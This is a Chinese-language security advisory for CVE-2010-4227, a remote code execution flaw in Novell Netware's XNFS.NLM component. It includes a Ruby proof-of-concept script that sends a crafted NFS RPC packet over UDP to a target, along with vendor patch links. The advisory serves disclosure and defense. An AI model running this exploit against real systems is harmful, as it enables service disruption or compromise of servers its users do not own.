安全研究

安全漏洞
Novell Netware 'XNFS.NLM'组件远程代码执行漏洞

发布日期:2011-02-18
更新日期:2011-02-24

受影响系统:
Novell Netware < 6.5 SP8
描述:
BUGTRAQ  ID: 46535
CVE(CAN) ID: CVE-2010-4227

Novell Netware是一款商业性质的网络操作系统。

Novell Netware 6.5版本中,XNFS.NLM的xdrDecodeString函数允许远程攻击者向UDP 1234发送包含特制签名值的NFS RPC请求,导致拒绝服务或执行任意代码。

<*来源:Francis Provencher
  
  链接:http://xforce.iss.net/xforce/xfdb/65625
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

#!/usr/bin/ruby

# Source:
# http://www.protekresearchlab.com/index.php?option=com_content&view=article&id=24&Itemid=24

require 'socket'

netware_server = (ARGV[0])
target_port = (ARGV[1] || 1234)


beepbeep=
"\x1c\xd1\xef\xab"  + # XID
"\x00\x00\x00\x00" + # Message Type: Call (0)
"\x00\x00\x00\x02" + # RPC Version: 2
"\x00\x01\x86\xa5" + # Program: 10005 MOUNT
"\x00\x00\x00\x02" + # Program Version: 2
"\x00\x00\x00\x01" + # Procedure: MNT  (1)
"\x00\x00\x00\x00\x00\x00\x00\x00" + #
"\x00\x00\x00\x00\x00\x00\x00\x00" + #Verifier NULL
"\x41\x42\x43\x44"




puts "[+] beep beep\n"
puts "[+]No, it's not the road runner\n"


if (!(netware_server && target_port))
    puts "Usage: PRL-2011-04.rb host port (default port: 1234)\n"
    exit
else
    puts "[+]Sending UDP Packet...\n"
    sock = UDPSocket.open
    sock.connect(netware_server, target_port.to_i)
    sock.send(beepbeep, 0)
end

建议:
厂商补丁:

Novell
------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://support.novell.com/security-alerts
http://download.novell.com/Download?buildid=1z3z-OsVCiE~

浏览次数:1591
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障